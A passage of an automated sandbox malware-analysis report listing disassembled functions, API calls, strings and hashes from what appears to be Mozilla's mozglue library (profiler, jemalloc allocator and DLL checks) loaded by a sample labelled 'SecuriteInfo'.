                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4D4A68), ref: 6C50945E
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C509470
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C509482
                                                • Part of subcall function 6C509420: __Init_thread_footer.LIBCMT ref: 6C50949F
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F350
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F35D
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F381
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F398
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C50F3A0
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F489
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C50F491
                                                • Part of subcall function 6C5094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5094EE
                                                • Part of subcall function 6C5094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C509508
                                              • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C50F3CF
                                                • Part of subcall function 6C50F070: GetCurrentThreadId.KERNEL32 ref: 6C50F440
                                                • Part of subcall function 6C50F070: AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F44D
                                                • Part of subcall function 6C50F070: ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F472
                                              • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C50F4A8
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F559
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C50F561
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F577
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F585
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F5A3
                                              Strings
                                              • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C50F56A
                                              • [I %d/%d] profiler_resume_sampling, xrefs: 6C50F499
                                              • [I %d/%d] profiler_resume, xrefs: 6C50F239
                                              • [I %d/%d] profiler_pause_sampling, xrefs: 6C50F3A8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                              • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                              • API String ID: 565197838-2840072211
                                              • Opcode ID: 8e9be10c175dbcb8e6acb79e918c37fd9449678404e6e24a8015b362967bd650
                                              • Instruction ID: eef0359db12bc7ad326c90f9b2559f143dc81b4d258219e670768c74c62ae992
                                              • Opcode Fuzzy Hash: 8e9be10c175dbcb8e6acb79e918c37fd9449678404e6e24a8015b362967bd650
                                              • Instruction Fuzzy Hash: 6FD1D535704604DFDB00FF68DC44B9A77B4EB8632CF15871AE96583B81DB715809C7AA
                                              APIs
                                              • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C4D64DF
                                              • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C4D64F2
                                              • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C4D6505
                                              • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C4D6518
                                              • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C4D652B
                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C4D671C
                                              • GetCurrentProcess.KERNEL32 ref: 6C4D6724
                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C4D672F
                                              • GetCurrentProcess.KERNEL32 ref: 6C4D6759
                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C4D6764
                                              • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C4D6A80
                                              • GetSystemInfo.KERNEL32(?), ref: 6C4D6ABE
                                              • __Init_thread_footer.LIBCMT ref: 6C4D6AD3
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4D6AE8
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4D6AF7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                              • API String ID: 487479824-2878602165
                                              • Opcode ID: 5080ef4ccc7f102414394e775933c709d82337693b85bdf210c0712be5750a6e
                                              • Instruction ID: c92a2aa0e34811b6f75766ae163702e5b7401c393af7eb76ab4a470462f831e0
                                              • Opcode Fuzzy Hash: 5080ef4ccc7f102414394e775933c709d82337693b85bdf210c0712be5750a6e
                                              • Instruction Fuzzy Hash: 95F1D3709012298BDB20EF24CC58FDAB7B5AF46319F1686D9D809A7741E731BA85CF90
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 6C4ED904
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C4ED971
                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6C4ED97B
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C4EE2E3
                                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4EE2E9
                                              • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C4EE308
                                              • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C4EE315
                                              • AcquireSRWLockExclusive.KERNEL32(6C54E804), ref: 6C4EE37C
                                              • GetSystemInfo.KERNEL32(?), ref: 6C4EE3C7
                                              • __Init_thread_footer.LIBCMT ref: 6C4EE3DA
                                              • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C54E810,00000040), ref: 6C4EE404
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54E7B8,00001388), ref: 6C4EE46D
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54E744,00001388), ref: 6C4EE483
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54E784,00001388), ref: 6C4EE4A9
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54E7DC,00001388), ref: 6C4EE4CA
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54E768,00001388), ref: 6C4EE50C
                                              • memset.VCRUNTIME140(00000000,00000000,00004000), ref: 6C4EE52E
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54E804), ref: 6C4EE54F
                                                • Part of subcall function 6C4DD960: EnterCriticalSection.KERNEL32(?), ref: 6C4DD999
                                                • Part of subcall function 6C4DD960: EnterCriticalSection.KERNEL32(6C54E7B8), ref: 6C4DDA13
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$CountInitializeSpin$Enter$ExclusiveK@1@LeaveLockMaybe@_RandomUint64@mozilla@@memset$AcquireEnvironmentInfoInit_thread_footerReleaseSystemVariable_errno
                                              • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                              • API String ID: 919329573-429003945
                                              • Opcode ID: 87c2d2072fbe30940e3fe1881492a35a31995f0ea193ecad9243072cf7414933
                                              • Instruction ID: 61955e9ebb9459ed218d7edbbe77daf0c2c4126e3f243a20ae83c38eceb0fcca
                                              • Opcode Fuzzy Hash: 87c2d2072fbe30940e3fe1881492a35a31995f0ea193ecad9243072cf7414933
                                              • Instruction Fuzzy Hash: 57927C71A056118FD714CF28C880F15BBE1BF8A72AF1AC66DE8698B791D771E841CBC1
                                              APIs
                                              • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C52C5F9
                                              • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C52C6FB
                                              • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C52C74D
                                              • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C52C7DE
                                              • memset.VCRUNTIME140(?,00000000,00004014), ref: 6C52C9D5
                                              • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C52CC76
                                              • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C52CD7A
                                              • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C52DB40
                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C52DB62
                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C52DB99
                                              • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C52DD8B
                                              • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C52DE95
                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C52E360
                                              • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C52E432
                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C52E472
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: memset$memcpy
                                              • String ID:
                                              • API String ID: 368790112-0
                                              • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                              • Instruction ID: e9b66e585f9ae3545622322bc6254302c85732a75a843c309e081287d3979f7c
                                              • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                              • Instruction Fuzzy Hash: A633AF71E0021ACFCB14CFA8C8806EDBBF2FF49310F284669D955AB795E735A945CB90
                                              APIs
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C4EEE7A
                                              • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C4EEFB5
                                              • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C4F1695
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4F16B4
                                              • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C4F1770
                                              • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C4F1A3E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: memset$freemallocmemcpy
                                              • String ID: ~qLl$~qLl
                                              • API String ID: 3693777188-2958376125
                                              • Opcode ID: 391d13b454f9c1a039dc58a81194664b4bf3127fae89290546b7407e5035cf25
                                              • Instruction ID: 59cb1120d58089683d9bfb28315a44ffcf836753eeef4f63c36e018a775347a4
                                              • Opcode Fuzzy Hash: 391d13b454f9c1a039dc58a81194664b4bf3127fae89290546b7407e5035cf25
                                              • Instruction Fuzzy Hash: 9EB32971E01219CFDB25CFA8C890E9DB7B2BF89304F1582A9D459AB745D730AD86CF90
                                              APIs
                                              • EnterCriticalSection.KERNEL32(6C54E7B8), ref: 6C4DFF81
                                              • LeaveCriticalSection.KERNEL32(6C54E7B8), ref: 6C4E022D
                                              • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C4E0240
                                              • EnterCriticalSection.KERNEL32(6C54E768), ref: 6C4E025B
                                              • LeaveCriticalSection.KERNEL32(6C54E768), ref: 6C4E027B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave$AllocVirtual
                                              • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
                                              • API String ID: 618468079-3577267516
                                              • Opcode ID: 83b02aad6ebc8cf5e0eab35e1e92df8956b5ade22b5b66d2996990aa97f84104
                                              • Instruction ID: d59ff154d6fbf61f682b9e9a6104d92642aa2f9f518b80ec8b91c17664930c5e
                                              • Opcode Fuzzy Hash: 83b02aad6ebc8cf5e0eab35e1e92df8956b5ade22b5b66d2996990aa97f84104
                                              • Instruction Fuzzy Hash: C8C2AF71A057418FD714CF28C880F16BBE1BF89329F29C66DE4A98B795D771E841CB81
                                              APIs
                                              • memcpy.VCRUNTIME140(?,?,00004014), ref: 6C52E811
                                              • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C52EAA8
                                              • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C52EBD5
                                              • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C52EEF6
                                              • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C52F223
                                              • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C52F322
                                              • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C530E03
                                              • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C530E54
                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C530EAE
                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C530ED4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: memset$memcpy
                                              • String ID:
                                              • API String ID: 368790112-0
                                              • Opcode ID: 398d1ddc25a9c5d787a79e1d6beeb71cc5d8f485b98d2e92970033cf1074262d
                                              • Instruction ID: dff8132091b9d2ed6885a55014d89d421633a8931c8fae52cffa7b48d6eb06d8
                                              • Opcode Fuzzy Hash: 398d1ddc25a9c5d787a79e1d6beeb71cc5d8f485b98d2e92970033cf1074262d
                                              • Instruction Fuzzy Hash: C3637E71E0025A8FCB14CFA8C8906DDF7F2FF89310F298269D859AB755E734A945CB90
                                              APIs
                                                • Part of subcall function 6C527770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(}>Pl,?,?,?,6C503E7D,?,?), ref: 6C52777C
                                              • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C503F17
                                              • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C503F5C
                                              • VerSetConditionMask.NTDLL ref: 6C503F8D
                                              • VerSetConditionMask.NTDLL ref: 6C503F99
                                              • VerSetConditionMask.NTDLL ref: 6C503FA0
                                              • VerSetConditionMask.NTDLL ref: 6C503FA7
                                              • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C503FB4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
                                              • String ID: C>Pl$nvd3d9wrap.dll$nvinit.dll
                                              • API String ID: 1189858803-959835003
                                              • Opcode ID: 03c61d4532ddd95ad18c01a46293b1d4153039ef5e5c3ae15fa65499998947b8
                                              • Instruction ID: 56521234c11efc6eccecbaaf6260709e85b6dde19c8a8a92819dc6186691d97b
                                              • Opcode Fuzzy Hash: 03c61d4532ddd95ad18c01a46293b1d4153039ef5e5c3ae15fa65499998947b8
                                              • Instruction Fuzzy Hash: 1052C072614B488BD714EF24C890EBB77E9AF85308F05492DE496CB742DB34F919CBA0
                                              APIs
                                              • EnterCriticalSection.KERNEL32(6C54E7B8), ref: 6C4DFF81
                                              • LeaveCriticalSection.KERNEL32(6C54E7B8), ref: 6C4E022D
                                              • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C4E0240
                                              • EnterCriticalSection.KERNEL32(6C54E768), ref: 6C4E025B
                                              • LeaveCriticalSection.KERNEL32(6C54E768), ref: 6C4E027B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave$AllocVirtual
                                              • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                              • API String ID: 618468079-3566792288
                                              • Opcode ID: 85c2b7eb02e3c780e5b8d92e1ee128493f84386f91eafdbf6b3ff9421e6db50d
                                              • Instruction ID: 64147cc3f99546ab7ab156cdf845eb967dadd16a5e24e11ed64393872ef93614
                                              • Opcode Fuzzy Hash: 85c2b7eb02e3c780e5b8d92e1ee128493f84386f91eafdbf6b3ff9421e6db50d
                                              • Instruction Fuzzy Hash: 0AB2C0716057418FD714CF29C990F16BBE1BF8932AF29C66CE86A8B796C770E841CB41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
                                              • API String ID: 0-2712937348
                                              • Opcode ID: e16af39b15fe15aaa20177532041bc6d62d43e302d6b11f9e83d05c5123b963d
                                              • Instruction ID: 40eaaade078b2d709ec56895dc09bb6ecd32b54c79a63aa1354dc7d4be888be0
                                              • Opcode Fuzzy Hash: e16af39b15fe15aaa20177532041bc6d62d43e302d6b11f9e83d05c5123b963d
                                              • Instruction Fuzzy Hash: D4924C71A083418FE724CF28C894B5AB7E1FFC9308F55891DE5999BB51DB30E909CB92
                                              APIs
                                              • EnterCriticalSection.KERNEL32(6C54E744), ref: 6C4D7885
                                              • LeaveCriticalSection.KERNEL32(6C54E744), ref: 6C4D78A5
                                              • EnterCriticalSection.KERNEL32(6C54E784), ref: 6C4D78AD
                                              • LeaveCriticalSection.KERNEL32(6C54E784), ref: 6C4D78CD
                                              • EnterCriticalSection.KERNEL32(6C54E7DC), ref: 6C4D78D4
                                              • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C4D78E9
                                              • EnterCriticalSection.KERNEL32(00000000), ref: 6C4D795D
                                              • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C4D79BB
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C4D7BBC
                                              • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C4D7C82
                                              • LeaveCriticalSection.KERNEL32(6C54E7DC), ref: 6C4D7CD2
                                              • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C4D7DAF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeavememset
                                              • String ID: DTl$DTl
                                              • API String ID: 759993129-1077644595
                                              • Opcode ID: 11a85085f3d316697e8a1983fa3257ebf0deb5ef62c3d5e77eccaeabb07b02a4
                                              • Instruction ID: 579181715a636b5fb96b4e71469e97a94a720469c6fbc35d5e9f67fee7606228
                                              • Opcode Fuzzy Hash: 11a85085f3d316697e8a1983fa3257ebf0deb5ef62c3d5e77eccaeabb07b02a4
                                              • Instruction Fuzzy Hash: AE028131A052198FDB54DF19C994F99B7B5FF88318F2682AAD809A7705D730BE91CF80
                                              APIs
                                              • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C512ED3
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C512EE7
                                              • MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C512F0D
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C513214
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C513242
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5136BF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: strlen$AddressCode$DescribeDetailsFormat
                                              • String ID: MOZ_PROFILER_SYMBOLICATE$get $set
                                              • API String ID: 2257098003-3318126862
                                              • Opcode ID: be7afa65eb8191f0e1cd43cdac97f3157efd7e86c42383a50b04c1f5a10ead3a
                                              • Instruction ID: a682990198565728dca70f30885ff2856eb102f055a2a99bc3fd4a7bca2676a6
                                              • Opcode Fuzzy Hash: be7afa65eb8191f0e1cd43cdac97f3157efd7e86c42383a50b04c1f5a10ead3a
                                              • Instruction Fuzzy Hash: 5D32507460C3818FE324CF24C894AAEB7E2AFC9318F558D1DE59987B51DB30D94ACB52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: memcpystrlen
                                              • String ID: (pre-xul)$data$name$schema$vTl
                                              • API String ID: 3412268980-1303428864
                                              • Opcode ID: c04c239b80b9098b78d3192d2b0b805c08bff230b26f5feb9f281bd35ea00ca3
                                              • Instruction ID: be3acbade76285437bc9149cab99e71e6db23c091b738d14304c233b3aa0978c
                                              • Opcode Fuzzy Hash: c04c239b80b9098b78d3192d2b0b805c08bff230b26f5feb9f281bd35ea00ca3
